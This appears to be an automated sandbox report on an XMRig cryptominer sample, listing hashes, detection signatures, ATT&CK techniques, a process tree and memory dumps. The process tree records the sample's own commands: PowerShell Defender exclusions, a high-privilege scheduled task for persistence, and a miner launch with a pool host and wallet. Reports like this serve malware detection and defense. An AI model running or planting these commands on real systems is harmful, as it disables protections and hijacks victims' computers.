xmrig | 679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23

Analysis

max time kernel
157s
max time network
180s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
30-11-2022 00:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe
Size

1.6MB
MD5

d36695737b155dbc6f5e323dad5918ef
SHA1

9daca899ab910b0b703eea93072105e8d9ddcc4d
SHA256

679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23
SHA512

0c3aca624ac61c7aedb94d58f19c3af36fa7c301bf6fa45e9ded32bbd119cdff45800b97a55cd7cfa5ea50c5052679755ee227ec845f799eee2a62a8ce23f2cb
SSDEEP

24576:pJoGc0fLQhEl6973d82wivuK/py5Z6nXYzf+S3KCwwb9BxcBeix7JepNY:pJoGc0fkE897N82Tuapy5Z6tib9BmB3

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1688-198-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1688-199-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/1688-200-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1688-201-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1688-203-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1688-205-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

PWOJ.exe

pid process

60 PWOJ.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

PWOJ.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation PWOJ.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

PWOJ.exe

description pid process target process

PID 60 set thread context of 1688 60 PWOJ.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

332 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2352 timeout.exe

pid	process
60	PWOJ.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	PWOJ.exe

description	pid	process	target process
PID 60 set thread context of 1688	60	PWOJ.exe	vbc.exe

pid	process
332	schtasks.exe

pid	process
2352	timeout.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exepowershell.exepowershell.exePWOJ.exepowershell.exepowershell.exe

pid	process
4600	679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe
4600	679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe
3380	powershell.exe
220	powershell.exe
220	powershell.exe
3380	powershell.exe
60	PWOJ.exe
60	PWOJ.exe
4212	powershell.exe
1844	powershell.exe
4212	powershell.exe
1844	powershell.exe
60	PWOJ.exe
60	PWOJ.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

656

pid	process
656

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exepowershell.exepowershell.exePWOJ.exepowershell.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	4600	679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeDebugPrivilege	60	PWOJ.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeLockMemoryPrivilege	1688	vbc.exe
Token: SeLockMemoryPrivilege	1688	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

1688 vbc.exe

pid	process
1688	vbc.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.execmd.exePWOJ.execmd.exe

description	pid	process	target process
PID 4600 wrote to memory of 3380	4600	679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe	powershell.exe
PID 4600 wrote to memory of 3380	4600	679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe	powershell.exe
PID 4600 wrote to memory of 220	4600	679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe	powershell.exe
PID 4600 wrote to memory of 220	4600	679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe	powershell.exe
PID 4600 wrote to memory of 1512	4600	679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe	cmd.exe
PID 4600 wrote to memory of 1512	4600	679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe	cmd.exe
PID 1512 wrote to memory of 2352	1512	cmd.exe	timeout.exe
PID 1512 wrote to memory of 2352	1512	cmd.exe	timeout.exe
PID 1512 wrote to memory of 60	1512	cmd.exe	PWOJ.exe
PID 1512 wrote to memory of 60	1512	cmd.exe	PWOJ.exe
PID 60 wrote to memory of 1844	60	PWOJ.exe	powershell.exe
PID 60 wrote to memory of 1844	60	PWOJ.exe	powershell.exe
PID 60 wrote to memory of 4212	60	PWOJ.exe	powershell.exe
PID 60 wrote to memory of 4212	60	PWOJ.exe	powershell.exe
PID 60 wrote to memory of 3864	60	PWOJ.exe	cmd.exe
PID 60 wrote to memory of 3864	60	PWOJ.exe	cmd.exe
PID 3864 wrote to memory of 332	3864	cmd.exe	schtasks.exe
PID 3864 wrote to memory of 332	3864	cmd.exe	schtasks.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe
PID 60 wrote to memory of 1688	60	PWOJ.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe
"C:\Users\Admin\AppData\Local\Temp\679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5890.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:2352

C:\ProgramData\netcore\PWOJ.exe
"C:\ProgramData\netcore\PWOJ.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:60

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3864

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"
5⤵
- Creates scheduled task(s)
PID:332

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1688

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\netcore\PWOJ.exe
Filesize
1.6MB

MD5
d36695737b155dbc6f5e323dad5918ef

SHA1
9daca899ab910b0b703eea93072105e8d9ddcc4d

SHA256
679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23

SHA512
0c3aca624ac61c7aedb94d58f19c3af36fa7c301bf6fa45e9ded32bbd119cdff45800b97a55cd7cfa5ea50c5052679755ee227ec845f799eee2a62a8ce23f2cb

Download Submit
C:\ProgramData\netcore\PWOJ.exe
Filesize
1.6MB

MD5
d36695737b155dbc6f5e323dad5918ef

SHA1
9daca899ab910b0b703eea93072105e8d9ddcc4d

SHA256
679bcda18e578956c30848b98c91571f93d51d00f38f1d4d4e025bac03683c23

SHA512
0c3aca624ac61c7aedb94d58f19c3af36fa7c301bf6fa45e9ded32bbd119cdff45800b97a55cd7cfa5ea50c5052679755ee227ec845f799eee2a62a8ce23f2cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
4fc1ceefa94c82f73b7ee478e2920ea3

SHA1
17a031c8d10e316478d85d24ba8a8b5ebfda3149

SHA256
018553e7801fd476285775a4df59eb6a6c79774f6253d6dcbe9e4e96de3c96fb

SHA512
cd581f4b96e1eff3e1c8e75e9e67050060f9bdc92c2a4a0ca8282b4b1839fde9f7848cc262b8ef189466bdd51c0940be7392ae7f0278b2113d10ed590d11b311

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5890.tmp.bat
Filesize
140B

MD5
986a50abf7dd63d55db0b34814c53bd9

SHA1
fcd9b51090409d546e79a970894334c7b4408610

SHA256
44793d2cd94048c6a1cdb3c2bf1a68f43fde7680b195f582b2968d566415a501

SHA512
504a053a84c443935f9f6ff5e1796544b6be83a11a3e613f10d19aaf1d3d85c07a65470f5ae5b19d536273b9e1e11daa5f5d2558e08fd239f2c8b58aff33dda8

Download Submit
memory/60-178-0x00000000009F0000-0x0000000000BE4000-memory.dmp

Filesize
2.0MB

Download
memory/60-174-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/60-188-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/60-187-0x00000000009F0000-0x0000000000BE4000-memory.dmp

Filesize
2.0MB

Download
memory/60-186-0x0000000002BA0000-0x0000000002BE3000-memory.dmp

Filesize
268KB

Download
memory/60-194-0x00007FFD38550000-0x00007FFD38585000-memory.dmp

Filesize
212KB

Download
memory/60-179-0x00007FFD38F90000-0x00007FFD390DE000-memory.dmp

Filesize
1.3MB

Download
memory/60-165-0x00007FFD3BD70000-0x00007FFD3BE1A000-memory.dmp

Filesize
680KB

Download
memory/60-177-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/60-195-0x00007FFD38590000-0x00007FFD38692000-memory.dmp

Filesize
1.0MB

Download
memory/60-176-0x00007FFD569E0000-0x00007FFD56A0B000-memory.dmp

Filesize
172KB

Download
memory/60-193-0x00007FFD56290000-0x00007FFD562B7000-memory.dmp

Filesize
156KB

Download
memory/60-175-0x00000000009F0000-0x0000000000BE4000-memory.dmp

Filesize
2.0MB

Download
memory/60-167-0x00007FFD53FB0000-0x00007FFD53FC2000-memory.dmp

Filesize
72KB

Download
memory/60-171-0x00007FFD57A50000-0x00007FFD57BF1000-memory.dmp

Filesize
1.6MB

Download
memory/60-196-0x00007FFD579E0000-0x00007FFD57A4B000-memory.dmp

Filesize
428KB

Download
memory/60-170-0x00007FFD3A710000-0x00007FFD3A7CD000-memory.dmp

Filesize
756KB

Download
memory/60-166-0x00007FFD57240000-0x00007FFD572DE000-memory.dmp

Filesize
632KB

Download
memory/60-197-0x00007FFD55460000-0x00007FFD5549B000-memory.dmp

Filesize
236KB

Download
memory/60-208-0x00000000009F0000-0x0000000000BE4000-memory.dmp

Filesize
2.0MB

Download
memory/60-159-0x0000000000000000-mapping.dmp

Download
memory/60-209-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/60-164-0x0000000002BA0000-0x0000000002BE3000-memory.dmp

Filesize
268KB

Download
memory/220-149-0x0000000000000000-mapping.dmp

Download
memory/220-161-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/220-157-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/220-172-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/332-192-0x0000000000000000-mapping.dmp

Download
memory/1512-150-0x0000000000000000-mapping.dmp

Download
memory/1688-203-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1688-211-0x0000025B0B1A0000-0x0000025B0B1C0000-memory.dmp

Filesize
128KB

Download
memory/1688-205-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1688-204-0x0000025B0B120000-0x0000025B0B160000-memory.dmp

Filesize
256KB

Download
memory/1688-198-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1688-210-0x0000025B0B160000-0x0000025B0B180000-memory.dmp

Filesize
128KB

Download
memory/1688-201-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1688-199-0x0000000140343234-mapping.dmp

Download
memory/1688-207-0x0000025B0B1A0000-0x0000025B0B1C0000-memory.dmp

Filesize
128KB

Download
memory/1688-206-0x0000025B0B160000-0x0000025B0B180000-memory.dmp

Filesize
128KB

Download
memory/1688-202-0x0000025B09820000-0x0000025B09840000-memory.dmp

Filesize
128KB

Download
memory/1688-200-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1844-183-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/1844-180-0x0000000000000000-mapping.dmp

Download
memory/1844-185-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/2352-155-0x0000000000000000-mapping.dmp

Download
memory/3380-156-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/3380-173-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/3380-152-0x0000028C56DE0000-0x0000028C56E02000-memory.dmp

Filesize
136KB

Download
memory/3380-158-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/3380-148-0x0000000000000000-mapping.dmp

Download
memory/3864-189-0x0000000000000000-mapping.dmp

Download
memory/4212-191-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/4212-181-0x0000000000000000-mapping.dmp

Download
memory/4212-184-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/4600-144-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/4600-145-0x0000000000B60000-0x0000000000D54000-memory.dmp

Filesize
2.0MB

Download
memory/4600-137-0x0000000000B60000-0x0000000000D54000-memory.dmp

Filesize
2.0MB

Download
memory/4600-136-0x00007FFD3A710000-0x00007FFD3A7CD000-memory.dmp

Filesize
756KB

Download
memory/4600-141-0x00007FFD569E0000-0x00007FFD56A0B000-memory.dmp

Filesize
172KB

Download
memory/4600-142-0x0000000000B60000-0x0000000000D54000-memory.dmp

Filesize
2.0MB

Download
memory/4600-143-0x00007FFD38FC0000-0x00007FFD3910E000-memory.dmp

Filesize
1.3MB

Download
memory/4600-133-0x00007FFD3BD70000-0x00007FFD3BE1A000-memory.dmp

Filesize
680KB

Download
memory/4600-139-0x00007FFD57A50000-0x00007FFD57BF1000-memory.dmp

Filesize
1.6MB

Download
memory/4600-138-0x0000000003940000-0x0000000003983000-memory.dmp

Filesize
268KB

Download
memory/4600-140-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/4600-146-0x0000000003940000-0x0000000003983000-memory.dmp

Filesize
268KB

Download
memory/4600-147-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download
memory/4600-135-0x00007FFD53FB0000-0x00007FFD53FC2000-memory.dmp

Filesize
72KB

Download
memory/4600-134-0x00007FFD57240000-0x00007FFD572DE000-memory.dmp

Filesize
632KB

Download
memory/4600-151-0x0000000000B60000-0x0000000000D54000-memory.dmp

Filesize
2.0MB

Download
memory/4600-153-0x00007FFD3A7D0000-0x00007FFD3B291000-memory.dmp

Filesize
10.8MB

Download